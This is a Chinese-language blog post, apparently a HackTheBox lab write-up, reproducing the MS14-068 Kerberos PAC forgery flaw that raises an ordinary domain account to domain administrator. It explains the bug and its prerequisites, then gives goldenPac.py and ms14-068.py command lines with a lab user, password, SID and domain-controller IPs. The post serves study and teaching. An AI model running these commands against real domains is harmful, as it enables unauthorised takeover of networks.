MS14-068 漏洞复现

admin 2025年1月22日10:03:02评论9 views字数 928阅读3分5秒阅读模式

漏洞危害

提升普通域账号为域管理员账号。

PAC

PAC中包含用户的SID、Group的SID。所以PAC决定了用户的组属性。决定了用户的权限。也就是根据PAC来给予客户端访问何种服务的权限。

PAC存在于TGT中,当用户使用TGT访问KDC的TGS的时候,TGS解密TGT检查PAC的合法性,并重新签名PAC,然后PAC会放在ST中,最后服务主机会根据所携带的PAC来决定客户端访问某些服务的权限。

漏洞关键点

1、KDC在进行签名认证的时候,可以使用客户端指定的任意签名算法。

  • 可以任意指定签名算法,所以伪造的内容就是合法的。

2、PAC没有被放在TGT中,但是KDC依旧能够解析PAC。

3、KDC会验证两个PAC,一个是TGT中的PAC,另一个是不在TGT中的PAC,验证成功之后,会提取KDC中的USER SID和组SID。进行重新签名。返回一个TGT给用户,而不是ST。

综上:

攻击者通过截取SID,构造高权限的用户,生成PAC,获取TGT,将普通域用户权限提升为域管理员权限。

漏洞利用前提

1.域控没有打MS14-068的补丁 2.攻击者拿下了一台域内的普通计算机,并获得普通域用户以及密码/hash值,以及用户的suid

漏洞利用

goldenPac

python3 goldenPac.py  -dc-ip 10.129.171.157 -target-ip 10.129.171.157  htb.local/james:J@m3s_P@[email protected]
MS14-068 漏洞复现

ms14-068

python ms14-068.py -u [email protected]  -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d 10.129.172.203 -p J@m3s_P@ssW0rd!
MS14-068 漏洞复现
python ms14-068.py -u htb.local/[email protected] -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d 10.129.172.203 -p J@m3s_P@ssW0rd!
MS14-068 漏洞复现

原文始发于微信公众号(土拨鼠的安全屋):MS14-068 漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月22日10:03:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MS14-068 漏洞复现https://cn-sec.com/archives/3650213.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息